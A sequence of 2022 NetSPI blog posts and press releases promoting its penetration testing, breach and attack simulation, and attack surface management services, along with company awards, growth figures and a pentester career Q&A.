Minneapolis, MN – NetSPI, the leader in penetration testing and attack surface management, today announced new Breach and Attack Simulation (BAS) enhancements to meet increased market demand for improved threat detection. With the combination of the AttackSim cloud-native technology platform and hands-on counsel from NetSPI’s expert penetration testing team, organizations can continuously test their detective controls against real-world attack tactics, techniques, and procedures (TTPs).

According to NetSPI data, only 20% of common attack behaviors are caught by out-of-the-box detective controls (EDR, SIEM, MSSPs) – leaving organizations with a false sense of security. The updates to NetSPI’s Breach and Attack Simulation allow detection engineers to measure their ability to detect common adversary behaviors and ultimately prioritize detection development as well as investments.  

Following the initial collaborative assessment with NetSPI’s experts, the AttackSim technology platform is provided to organizations for continuous testing and improvement. The platform features many new updates including: 

  • Seamless use, regardless of skill level: An enhanced user experience (UX) and a refined user interface (UI) can be used by experts and novices alike.
  • New automated plays and playbooks: Detailed manual procedures for reproducing attacker behavior, as well as consistently updated security playbooks, allow organizations to better strengthen their security posture. With the latest updates, NetSPI has nearly 300 attack plays that can be used to test detective controls.
  • Enhanced reporting: Security teams now have additional data and metrics to work with, such as peer comparison, year-over-year reporting, and telemetry flow analysis. New reports that support programmatic, tactic, technique, and procedure (TTP) summary metrics are also now available.  

“Indicators of Compromise have become less useful as the threat landscape evolves at a breakneck speed,” said Cody Chamberlain, Head of Product at NetSPI. “To stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. The NetSPI AttackSim platform, combined with the power of our skilled team of penetration testers, lets organizations continuously simulate real attack behavior, providing better insight into the efficacy of their detective controls.” 

“Small and medium-sized organizations with limited personnel often rely on MSSPs to implement detections and operate similarly to a security operations center (SOC),” said Scott Sutherland, Senior Director, Adversary Simulation and Infrastructure Testing at NetSPI. “We built Breach and Attack Simulation not only to improve detections, but also to enable organizations to validate MSSP coverage and better understand the scope of their agreements.” 

NetSPI will be demoing the AttackSim platform and its new capabilities during RSA Conference 2022 at booth #4605 in the North Expo Exhibit Hall. Schedule a meeting with the team.

To learn more about Breach and Attack Simulation, email sales@netspi.com or visit https://www.netspi.com/security-testing/breach-and-attack-simulation/.


About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com 
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com 
(978) 201-2510 

Title: NetSPI’s New Breach and Attack Simulation Enhancements Help Organizations Achieve Behavior-Based Threat Detection
Excerpt: Learn how organizations can leverage breach and attack simulation for continuous detective control reviews, to evaluate MSSP coverage, and improve behavior-based threat detection.
URL: https://www.netspi.com/?p=27843 (slug: breach-and-attack-simulation-enhancements-threat-detection), last modified 2022-05-31 16:25:13

Next post (ID 27715), published 2022-04-28 13:27:28:
The competitive business awards recognize entrepreneurs and leaders of high-growth companies who think big to succeed

Minneapolis, MN – Ernst & Young LLP (EY US) today announced that Aaron Shilts, CEO and President of NetSPI, was named an Entrepreneur Of The Year® 2022 Heartland Award finalist. He is one of 28 finalists that have been selected by a panel of independent judges based on entrepreneurial spirit, purpose, growth, and impact – among other core contributions and attributes.

“What an honor to be listed next to some of the top business leaders in this region – arguably, some of the best in the country,” said Aaron. “But behind every great leader, is a team of even greater leaders. Without the support of every individual at NetSPI, we would not have achieved the high-growth, success, and innovation that we saw over the past two years. Together we’ve led NetSPI to become THE leader in offensive cybersecurity, helping to secure many of the world’s most prominent organizations.”

Regional award winners will be announced on June 9, 2022, at The Fillmore Minneapolis. The regional winners will then be considered by the National independent judging panel, and National awards will be presented in November at the Strategic Growth Forum®, one of the nation’s most prestigious gatherings of high-growth, market-leading companies. The Entrepreneur Of The Year National Overall Award winner will then move on to compete for the EY World Entrepreneur Of The Year™ Award in June 2023.

“The 2022 Entrepreneur Of The Year finalists have shown us that ambition, courage, ingenuity and empathy are key to driving change,” said Dominic Iannazzo, Heartland Program Co-director. “They have a mindset that drives them to strive for more and an unwavering commitment to their companies, customers and communities.”

For over 35 years, EY US has celebrated the unstoppable entrepreneurs who are building a more equitable, sustainable, and prosperous world for all. The Entrepreneur Of The Year program has recognized more than 10,000 US executives since its inception in 1986.

###

About NetSPI 

NetSPI is the leader in enterprise penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three out of the five FAANG companies, the world’s largest healthcare organizations, the largest global cloud providers, and many of the Fortune® 500. Its platform driven, human delivered Penetration Testing, Adversary Simulation, and Attack Surface Management services are supported by dynamic technology platforms and a dedicated team of global penetration testing experts. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

About the Sponsors

Entrepreneur Of The Year is the world’s most prestigious business awards program for unstoppable entrepreneurs. These visionary leaders deliver innovation, growth and prosperity that transform our world. The program engages entrepreneurs with insights and experiences that foster growth. It connects them with their peers to strengthen entrepreneurship around the world. Entrepreneur Of The Year is the first and only truly global awards program of its kind.

It celebrates entrepreneurs through regional and national awards programs in more than 145 cities in over 60 countries. National overall winners go on to compete for the EY World Entrepreneur Of The Year™ title. Visit ey.com/us/eoy.

About EY Private

As Advisors to the ambitious™, EY Private professionals possess the experience and passion to support private businesses and their owners in unlocking the full potential of their ambitions. EY Private teams offer distinct insights born from the long EY history of working with business owners and entrepreneurs. These teams support the full spectrum of private enterprises including private capital managers and investors and the portfolio businesses they fund, business owners, family businesses, family offices and entrepreneurs. Visit ey.com/us/private.

About EY

EY exists to build a better working world, helping create long-term value for clients, people and society and build trust in the capital markets.

Enabled by data and technology, diverse EY teams in over 150 countries provide trust through assurance and help clients grow, transform and operate.

Working across assurance, consulting, law, strategy, tax and transactions, EY teams ask better questions to find new answers for the complex issues facing our world today.

EY refers to the global organization, and may refer to one or more of the member firms, of Ernst & Young Global Limited, each of which is a separate legal entity. Ernst & Young Global Limited, a UK company limited by guarantee, does not provide services to clients. Information about how EY collects and uses personal data and a description of the rights individuals have under data protection legislation are available via ey.com/privacy. EY member firms do not practice law where prohibited by local laws. For more information about our organization, please visit ey.com.

Ernst & Young LLP is a client-serving member firm of Ernst & Young Global Limited operating in the US.

Media Contacts:
Tori Norris, NetSPI Director of Brand and Communications
victoria.norris@netspi.com
(630) 258-0277 

Julia Menefee, EY
Julia.Peters@ey.com 
(213) 240-7436

Post: EY Announces NetSPI CEO Aaron Shilts as an Entrepreneur Of The Year® 2022 Heartland Award Finalist. Excerpt: Learn why Aaron Shilts is being recognized as a top Minnesota business leader alongside 28 other leaders and entrepreneurs in the Heartland region. Permalink: https://www.netspi.com/?p=27715 (last modified 2022-04-28).

Next post, published 2022-04-26 (https://www.netspi.com/?p=27690):

At NetSPI, we invest heavily in our processes and technology to continuously perform high-quality penetration testing services for our clients. But ask any of our clients and they’ll tell you that the greatest quality that sets NetSPI apart from other pentesting vendors is our people – arguably the greatest and most important investment we can make. 

It’s no secret that the cybersecurity and technology industry is experiencing 0% unemployment rates. And the competition is fierce for qualified talent that is not only technical but also understands the implications of cybersecurity. 

Case in point: NetSPI recently attended the Secure World Boston cybersecurity event. In one session, the presenter asked the room of more than 50 CISOs and other security leaders to raise their hand if they had open cybersecurity positions that they were struggling to fill. Nearly every single hand in the room went up. 

One way NetSPI is investing and bringing in new and qualified talent is the NetSPI University (NetSPI U) program. This penetration testing training program is specifically for entry-level talent looking to begin their career in cybersecurity.  

Since its inception in 2018, 83% of all NetSPI U “graduates” have continued their careers at NetSPI to this day – many of whom are now in leadership positions. 

This competitive training program is available in Minneapolis, Portland (OR), Lehi, and Pune (or remotely, depending on the situation). You join as an Associate Security Consultant and receive hands-on penetration testing training focused on NetSPI’s proven testing methodology. Not to mention the competitive benefits and the opportunity to be mentored by some of the best talent in cybersecurity. [To view our open pentesting jobs, visit our careers page] 

To share a first-hand perspective on what it’s like to become a pentester, we asked four NetSPI U alumni to describe their experiences getting into and working in the pentesting industry.  

What did you wish you knew before you transitioned into cybersecurity? 

Karin Knapp, Security Consultant (NetSPI U Class of 2021): 

“I wish I had known more about a career in cybersecurity while in school. With limited experience in cybersecurity before I applied to NetSPI U, I wish I had taken more electives that would've been more applicable to my current role instead of what I thought I wanted to do before I graduated.”  

Matt Ostrom, Managing Consultant (NetSPI U Class of 2018): 

“Pentesting is a team job. There is no room, nor should there be room for ‘rockstars’.”  

Marissa Allen, Security Consultant II (NetSPI U Class of 2020): 

“I wish I had known more certainly what cybersecurity career path I wanted to take. Everything is interesting, and it can take a while to narrow down your interests in the field given there are so many paths you can take.”  

Sam Horvath, Technical Client Director (NetSPI U Class of 2018): 

“Ignorance is bliss – once you know how insecure most systems are, you’ll be perpetually ‘paranoid’ to some degree.”  

What is one piece of advice you’d give to someone who wants to get started in pentesting? 

Karin: 

“Take a look at websites designed to help you practice your pentesting skills like PortSwigger, HacktheBox, or TryHackMe. These are great ways to familiarize yourself with the basics of pentesting with hands-on, guided practice.”  

Matt: 

“Start gathering knowledge however you can. Whether that be through reading books or blogs, setting up your home lab of virtual machines – in a cloud environment or something like VirtualBox – testing vulnerable web applications, etc. Every little bit helps.” 

Marissa:  

“I think the best advice I can give is don’t be afraid to ask questions. There is a ton of information out there, and it can be difficult to sort through. There are many great sites that you can learn new skills from and people that will be willing to guide you if you reach out.” 

Sam: 

“Start meditating and/or doing intense cardio daily. Being able to put your brain in a calm space at the end of the day after exhausting your critical thinking/problem-solving centers is the key to rejuvenation and rest.” 

What characteristics make a great pentester? Why? 

Karin: 

“Having a passion to always want to learn more about cybersecurity and pentesting is probably the best characteristic in my opinion. The ability to get creative and think outside of the box, and to not give up on difficult problems is also super valuable.” 

Matt: 

“First, someone who is determined to succeed. Sometimes, we’ll have to go through 99 different failures on exploiting a vulnerability before finding the one that works. Second, someone who loves learning. The cybersecurity industry is constantly changing and keeping pace with those changes is important. And lastly, someone who genuinely wants to make a difference. The work we do is incredibly important, and I feel like our work matters in keeping our clients safe.” 

Marissa: 

“If you like research, puzzles, and problem solving, then you've got this. You’ll come across areas in your penetration tests where you will need to dig into a problem. If you have an investigative personality, then you have the tenacity to go down the rabbit hole and find out if there is a vulnerability or not.” 

Sam: 

“Perseverance. Cracking the hardest problems and puzzles means you can’t get discouraged easily. 99% of people won’t get it on the first try, and that’s okay.” 

What was the most rewarding/beneficial part of your NetSPI U experience? 

Karin: 

“I realized shortly before NetSPI U that I wanted a career in cybersecurity, but I thought I would have to go back to school to be able to get a job in the field. NetSPI U taught me everything that I needed to know and helped me build a solid foundation to be a successful pentester. In addition, I got to meet some awesome people such as those from my NetSPI U class and people who were my mentors in the program. They are the reason I look forward to coming into the office even a year after I ‘graduated’.” 

Matt: 

“NetSPI U gives people the opportunity to break into the cybersecurity industry. The idea/concept of the NetSPI U program is a rarity. Being able to go from having a little bit of cybersecurity experience to feeling like I’m confident and ready to start executing on client projects after the program was, and continues to be, invaluable. Additionally, learning from people who have spent years in the industry was crucial. The depth of knowledge they were able to share during the program is the reason why it keeps succeeding and producing stellar pentesters.”  

Marissa: 

“NetSPI U gave me the knowledge and tools to succeed in my career. The program helps future pentesters succeed in that aspect by pairing them with a seasoned pentester as their mentor to provide guidance and answer any questions. It helped me better understand the breadth of work being performed. The program ultimately enabled me to figure out which direction I wanted to grow in my career.” 

Sam: 

“Learning that I had the ability and the drive to develop and succeed in the information security space was a validation of years of work in learning the basics of computer science. Finding a fantastic set of colleagues to learn, grow, and develop friendships within that process was just a bonus.” 

The Future of Penetration Testing 

A career in cybersecurity is a lucrative and rewarding one to get into for the foreseeable future. As cybercrime continues to rise, companies will only continue to invest in services such as penetration testing. Becoming a pentester is not for the faint of heart, but if you have the perseverance to see a project through to the end, as Karin, Matt, Marissa, and Sam described, penetration testing could be for you.

Want more information about NetSPI U?

Post: Getting Started as a Pentester: Cybersecurity Career Q&A. Excerpt: NetSPI U alumni share their experience breaking into a career in cybersecurity and advice on how to get started as a pentester. Permalink: https://www.netspi.com/?p=27690 (last modified 2022-04-27).

Next post, published 2022-03-30 (https://www.netspi.com/?p=27576):

On March 30, 2022, NetSPI was featured in the VentureBeat article, What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era. Preview the article below, or read the full article online.

+ + +

For an increasing number of organizations, the explosion in attack surfaces has reached unmanageable levels amid the COVID-19 pandemic and the widespread adoption of cloud services. In fact, research shows seven in 10 organizations have been compromised by an unknown or unmanaged asset. 

As remote working has grown more popular during the pandemic, environments that sprawl across on-premises and cloud environments have expanded enterprise attack surfaces to the point where they can’t be secured through traditional IT security approaches alone.

NetSPI Brings Penetration Testing to the ASM Market 

As the need for ASM solutions increases, many security vendors are beginning to move into the space. One such provider is NetSPI, a penetration testing-as-a-service provider that’s raised $100 million in funding to date, which last month launched a new ASM tool that incorporates human penetration testing.

NetSPI’s solution automatically scans attack surface assets and alerts users to high-risk exposure, while NetSPI’s internal team evaluates the risk posed by discovered issues and provides the organization with guidance on how to remediate them.

The use of human penetration testing is unique in the market, and enables organizations to benefit from automated asset scanning alongside the rich risk insights of an experienced penetration testing team, who can identify what threats a risk poses in a way that automated solutions cannot.

Post: VentureBeat: What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era. Excerpt: On March 30, 2022, NetSPI was featured in the VentureBeat article, What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era. Permalink: https://www.netspi.com/?p=27576 (last modified 2022-03-31).

Next post, published 2022-03-29 (https://www.netspi.com/?p=27549):

Silos still exist in cybersecurity, where related functions and activities operate asynchronously with other parts of the organization. This is especially true with application security.

Various tests occur throughout the software development life cycle (SDLC), but they often lack context or are not in sync with other security activities, leaving organizations with gaps in coverage and a narrow view of their AppSec program.  

To help change the way we approach application security testing today, three AppSec experts came together to discuss this topic in the webinar, Application Security In Depth: Understanding The Three Layers Of AppSec Testing. In this blog, we’ll share key takeaways from the discussion, which features Moshe Zioni, VP of Security Research at Apiiro; Nabil Hannan, Managing Director at NetSPI; and Samir Sherif, CISO at Imperva. 

Why Context is Key During Application Security Testing 

Contextual data is important. It helps organizations understand their SDLC through a broad lens and assists in prioritization of workflows and next steps. Not all vulnerabilities identified will be fixed immediately, and context is key to remediating those that pose the highest risk to the business first and fastest. 

Moshe shares the following five different contextual triggers security leaders should pay close attention to in the SDLC. 

Five Contextual Triggers to Leverage in the SDLC 

  1. Design: At the design stage, prioritize according to which threat model sessions you’d like to have. If several designs are going through an agile development life cycle, prioritize them by balancing the capacity you have as security practitioners against the actual deployment schedule. This stage is also important for triggering a contextual compliance review. If something is required for compliance and you didn’t prepare for it, going back to implement it later will be costly and difficult. 
  2. Branch: After a pull request, you should have context around the code itself. First, analyze the code. This can be done by a manual review or by any automated tool that enriches the data about the code. Through this context point, you can get multiple triggers according to your workflows, how lean you want to be, and what priority you assign to the commit itself. If a commit is high priority, for example because it touches sensitive data or comes from a new developer, these context points form a weighting system that helps automate the risk questionnaire and code governance. Once the automation is in place, you’ll have a cadence and governance rules for when to trigger each point instead of triggering everything. 
  3. Repository: At the repository level, you gain context about the repository: what business impact the application has, what information passes through the application, and who the customer is. These points give you a coherent view of what needs to be done to secure your application. This is especially true if you must satisfy compliance rules. The repository is not to be overlooked and should have its own triggers and workflows.   
  4. CI/CD: The last point of the coding journey is the CI/CD system, or any integration and deployment process. CI/CD is continuous, so cycles will be running throughout the organization. There should also be a lean and safe process for the CI/CD pipeline itself. Integrity and provenance of the CI/CD pipeline are important to automate, as is integrating integrity checks across the whole CI/CD life cycle. 
  5. Production: Before production, you should have another set of eyes look over the information for anything that looks suspicious. 

Along with the context points and material changes, Moshe explains that “all of this comes together to create a complete picture and mission, which is an ongoing cycle that doesn’t disrupt and interrupt the deployment process but gives you confidence on what kind of design and code you’re going to push to the cloud.” 

Best Practices for Application Penetration Testing and Secure Code Review 

Many different application security testing activities are completed throughout the SDLC, but penetration testing and secure code review are two of the most common and effective.  

A larger concern, however, is that organizations struggle to get the most out of these tests because they lack clarity on the results they want to achieve. Below are five best practices organizations can implement to optimize these tests. 

Five Best Practices for Application Penetration Testing 

  1. Determine your business objectives. Organizations need to have a clear understanding of their business objectives and how they will make money. This will aid in building a proper application security roadmap and help organizations allocate resources and identify which areas to focus on. 
  2. Contextualize the vulnerabilities. Don’t just perform a security test; fix the vulnerabilities it identifies. This means understanding the vulnerabilities, contextualizing them based on the business risks, and figuring out which ones to remediate first.  
  3. Acquire buy-in from finance and risk leadership. Gaining support from finance, the Chief Compliance Officer, and other risk leaders and partners will enable organizations to perform testing on a regular cadence with the appropriate resources and budget for testing. 
  4. Perform proper threat modeling and design level analysis. Then, utilize the results to determine new and creative ways that attackers may be trying to gain access to company-wide assets or software that can’t be derived from regular pentesting. 
  5. Invest in continuous pentesting. Point-in-time testing is no longer sufficient if organizations want to protect their software and assets. Instead, it’s time to invest in continuous pentesting to keep up with the rate of change organizations face today. 

One of the earliest times to detect a vulnerability is when the code is being written. Nabil shared this advice on how to start: “From a secure code review perspective, make sure you start aligning different tooling technology and code review activities with your software development cadence so that they are in lockstep in how they’re performed.” 

Here are six additional best practices for secure code review. 

Six Best Practices When Performing a Secure Code Review 

  1. Don’t get complacent. Organizations should be rotating the people who are reviewing source code over time, so everyone is immersed in devising creative ways to discover and fix vulnerabilities.   
  2. Build a methodology for code review. Create a champions program where developers are being trained to write secure code from the get-go. Then reward them for their efforts.  
  3. Transparency is key. Similar to the pentesting best practice above, organizations need to make sure they’re involving folks in leadership and other areas. This means explaining the need for security testing at the code level and how tooling, manual reviews, and automation are helpful with the development process and help build the software securely. 
  4. Prioritize onboarding and scan frequency. Organizations should be testing the right assets, the right applications, and at the right frequency and key timeframe. 
  5. Provide the proper training. Determine how to deal with the different bugs and vulnerabilities that were discovered. This is where it’s important that developers are equipped with the right training and education to fix these vulnerabilities. Another thing to consider is gamifying training so that folks can consume remediation guidance in bite-sized pieces.  
  6. Measure and improve. Aim for continuous improvement. To accomplish this, organizations need to ensure they’re capturing key metrics and evaluating remediation rates. Are there vulnerabilities that keep recurring? Are developers writing better quality code over time? Are they able to abstract out certain security controls and put them into a secure development framework to reduce the cost, time, and effort it takes to fix the vulnerabilities? 


Solutions to Consider in the Implementation Journey 

In application security, risk is one of the key drivers in delivering effective solutions for your application security program. “At the end of the day, it’s really about risk. How you manage risk and how you manage resiliency for your solutions. Not only from the AppSec perspective but also from the perspective of running your business and supporting the business that you’re in today,” shared Samir.  

Samir explained that the three biggest drivers for security testing include: 

  • How well am I protecting customer data? 
  • How effectively am I building resilience for the technologies that I am providing as a service to customers? 
  • How well do all the different capabilities from infrastructure security to monitoring solutions interplay with each other in application security? 

What matters most in application security? According to Samir, there isn’t a single solution. We need to have a comprehensive view across the whole environment. Here, Samir shares examples of solution capabilities he recommends security teams implement, especially if you are selling or servicing solutions to your customers.  

  • Awareness and Education
  • In-App Protection
  • Advanced Solutions
  • Code Analysis
  • Perimeter Protection
  • Proactive Solutions 

Awareness, education, and code analysis will continue to evolve. Adversaries are always changing the game when it comes to finding vulnerabilities given the popularity of third-party and open-source components. There is always a new need to look at different capabilities based on this risk context. Solutions that are not only advanced but practical will be increasingly important.  

Samir continued, “Shift left-to-right is critical.” To measure the application security program, organizations need to look at the SDLC from one end to the other and from different contexts: how they develop and train their engineers, and what they’re seeing on the infrastructure side with solutions that provide visibility into how they’re deploying and the types of attack patterns that target their applications.  

Understanding the interplay between these capabilities will help organizations understand what to address and prioritize to drive the effectiveness of their application security program.

A Layered Approach to Application Security Testing  

Using the strategies discussed in this blog post and in the webinar, you’ll be able to implement a layered approach to AppSec that will help you build a world-class AppSec program. It starts with learning how to incorporate a risk context across the SDLC, then determining the key timeframes to implement application security testing and understanding how your solution capabilities interplay with one another.

Listen to the full conversation on building a world-class, layered application security program.
Post: How to Build a Layered Approach to Application Security Testing. Excerpt: Learn best practices from top AppSec experts to help you build a world-class application security testing program. Permalink: https://www.netspi.com/?p=27549 (last modified 2022-03-25).

Next post, published 2022-02-22 (https://www.netspi.com/?p=27377):
The offering leverages innovative technology and expert pentesters to help organizations discover and secure all assets on the external attack surface.

Minneapolis, MN – NetSPI, the leader in enterprise penetration testing, today introduced Attack Surface Management to help secure the expanding, global attack surface. The platform delivers continuous pentesting backed by NetSPI’s global security testing team to help organizations inventory known and unknown internet-facing assets, identify exposures, and prioritize critical risks to their business. 

According to Gartner’s Emerging Technologies: Critical Insights for External Attack Surface Management report, analysts recommend attack surface management implementation “as part of a broader, enterprise-wide vulnerability and threat management effort, where known and unknown risks, vulnerabilities and assets are handled as part of a concerted and integrated strategy.” 

Attack Surface Management is a core component of NetSPI’s Penetration Testing as a Service (PTaaS) delivery model. It complements the company’s established Penetration Testing and Adversary Simulation technology-powered services to provide an integrated, full suite of offensive security solutions for its customers.

“You don’t know what you don’t know, and what you don’t know can hurt you,” said Travis Hoyt, Chief Technology Officer at NetSPI. “What we have built here is a comprehensive solution to shadow IT and asset management challenges. Attack Surface Management provides an opportunity for organizations to continuously enhance their security posture, improve their penetration testing strategies, and ultimately reduce the probability and impact of a costly cyberattack.”

https://youtu.be/ElP3hKWc55E

Key capabilities of NetSPI’s Attack Surface Management include: 

  • Comprehensive Asset Discovery: NetSPI’s Attack Surface Management technology platform leverages automated scanning and orchestration technology to map, identify, and inventory all assets and improve attack surface visibility.  
  • 24/7/365 Continuous Testing: The cloud-native, dynamic application monitors the attack surface continuously and alerts when a high-risk exposure is detected. It provides simplified and always-on attack surface visualization to view your entire external attack surface in a single platform. 
  • Manual Exposure Triaging: The NetSPI Attack Surface Management (ASM) Operations Team triages high-risk exposures to validate the exposure, evaluate the risk it poses to your business, support your team with remediation advisory, and escalate worrisome exposures to our penetration testing team to investigate further. 

“The current attack surface management market is reliant on technology. But to find critical exposures that put your organization at risk, human intuition is required,” said Aaron Shilts, CEO at NetSPI. “Our ASM Operations Team is rooted in 20 years of manual penetration testing expertise. We bring a human-centric, strategic approach to the market that will help security leaders get a better handle on their evolving attack surface.” 

The Attack Surface Management (ASM) platform also features simple set-up, tracking and trending data over time, asset intelligence, Slack and email integrations, open source intelligence gathering, asset and exposure prioritization, port discovery, and more. For additional details on its capabilities and features, download the attack surface management data sheet.

To learn more or get started with Attack Surface Management, email sales@netspi.com or visit our website.

About NetSPI 

NetSPI is the leader in enterprise penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three out of the five FAANG companies, the world’s largest healthcare organizations, the largest global cloud providers, and many of the Fortune® 500. Its platform-driven, human-delivered Penetration Testing, Adversary Simulation, and Attack Surface Management services are supported by dynamic technology platforms and a dedicated team of global penetration testing experts. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com 
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com 
(978) 201-2510 

Post: NetSPI Launches New Attack Surface Management Platform. Excerpt: Learn more about NetSPI's Attack Surface Management solution which leverages innovative technology, continuous penetration testing, and expert pentesters to help organizations discover and secure all assets on the external attack surface and increase attack surface visibility. Permalink: https://www.netspi.com/?p=27377 (last modified 2022-02-22).

Next post, published 2022-02-01 (https://www.netspi.com/?p=27266):
Amidst a year of rapid growth, NetSPI is recognized for its strong corporate culture.

Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the top workplaces in the U.S. by Energage – a leading provider of technology-based employee engagement tools. Winners are chosen based on an anonymous third-party employee survey that measures several aspects of workplace culture, including alignment, execution, and connection.

"This recognition by Energage is a true testament to what makes NetSPI a leading, innovative company," said Aaron Shilts, CEO of NetSPI. "Our employees are the heart of our business, working to drive results for our clients, while celebrating our wins together as a team. I’m proud to see NetSPI recognized for our strong culture, as it is the key to what makes our company special."

This Top Workplace recognition follows a year of success and growth for the company. The team brought on more than 100 new employees in 2021, all of whom played a part in achieving 51% organic revenue growth and 100% bookings growth throughout the fiscal year.

"While we’ve grown rapidly over the past year, increasing the size of our team by 50%, we have not lost sight of the elements that make NetSPI a great place to work," said Heather Neumeister, Director of People Operations at NetSPI. "Our employees prioritize collaboration and foster both individual and team growth, creating a culture where everyone is excited to come to work each day."

Top Workplaces USA celebrates organizations with 150 or more employees that have built great cultures. While more than 42,000 organizations were invited to participate, just over 1,100 organizations have been honored with the Top Workplaces USA award this year. 

NetSPI is hiring. Visit www.netspi.com/careers to view open roles and apply.

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

About Energage 

Making the world a better place to work together.™
Energage is a purpose-driven company that helps organizations turn employee feedback into useful business intelligence and credible employer recognition through Top Workplaces. Built on 14 years of culture research and the results from 23 million employees surveyed across more than 70,000 organizations, Energage delivers the most accurate competitive benchmark available. With access to a unique combination of patented analytic tools and expert guidance, Energage customers lead the competition with an engaged workforce and an opportunity to gain recognition for their people-first approach to culture. For more information or to nominate your organization, visit Energage or Workplaces.

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 

[Post: Energage Names NetSPI a 2022 Top Workplaces USA Winner. Excerpt: Read how NetSPI won the 2022 Top Workplaces USA with its strong corporate culture and significant growth. https://www.netspi.com/?p=27266, last modified 2022-01-28.]

[Post published 2022-01-25:]
NetSPI reports a record-high year for growth and momentum, solidifying its role in the evolving security industry.

Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the achievement of 51% organic revenue growth in fiscal year 2021. This positions NetSPI as a competitive solution in the Penetration Testing as a Service (PTaaS) industry. Additionally, the company partnered with more than 319 new clients and welcomed 119 new employees.

To achieve continued success in 2022, NetSPI appointed financial services industry veteran, Travis Hoyt, as Chief Technology Officer to help drive penetration testing, adversary simulation, and attack surface management product strategy. NetSPI also promoted Alex Jones to the company’s first Chief Revenue Officer, where he will continue driving strategic growth.  

“NetSPI’s 100% bookings growth in 2021 was driven by our customer-first approach to implementing meaningful security posture improvements across our client base,” said Aaron Shilts, CEO of NetSPI. “Our talented team of employees has continued to innovate by offering the highest fidelity testing results so clients can easily consume results in real-time and remediate potential threats. As we look to the new year, our team will continue to redefine penetration testing through our platform-driven, human-delivered approach and power clients with services that enable them to be prepared for any vulnerability.” 

Achievements that contributed to NetSPI’s success in 2021 include: 

  • $90 Million in Growth Funding: Led by KKR, with participation from Ten Eleven Ventures, the investment will be used to further accelerate NetSPI’s rapid growth. The team will prioritize expanding and investing in product innovation and deepening operations across all markets. 
  • Introduction of Risk Scoring: NetSPI added risk scoring intelligence to its Penetration Testing as a Service (PTaaS) platform to help its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business. 
  • New Ransomware Attack Simulation Service: The new technology-powered service enables organizations to emulate real world ransomware to help continuously improve their ability to detect ransomware attacks. 
  • Discovery of Critical Azure Vulnerability: Practice director Karl Fosaaen discovered a critical misconfiguration in Microsoft Azure which, if exploited, would allow malicious actors to escalate up to a Contributor role in the Azure Active Directory subscription. Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue.
  • Apache Log4j Assessment: NetSPI leveraged its PTaaS platform to create a robust, targeted assessment that tests client environments for vulnerable Log4j instances. This service uses the power of NetSPI’s technology and penetration testers to find and help remediate the ubiquitous vulnerability across an organization’s attack surface.
  • IoT Penetration Testing: NetSPI added IoT penetration testing services to its existing suite of capabilities. NetSPI’s new IoT testing services focus on identifying security flaws in ATM, automotive, operational technology, embedded, and medical devices and systems.

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 

[Post: NetSPI Exceeds 50% Organic Revenue Growth in 2021. Excerpt: KKR growth funding, advancements in penetration testing services, strategic partnerships, and more contributed to NetSPI’s record revenue growth. https://www.netspi.com/?p=27234, last modified 2022-01-25.]

[Post published 2022-01-19:]
Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs, and technology executives. 

Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Chief Technology Officer Travis Hoyt was accepted into Forbes Technology Council, an invitation-only community for world-class CIOs, CTOs, and technology executives. 

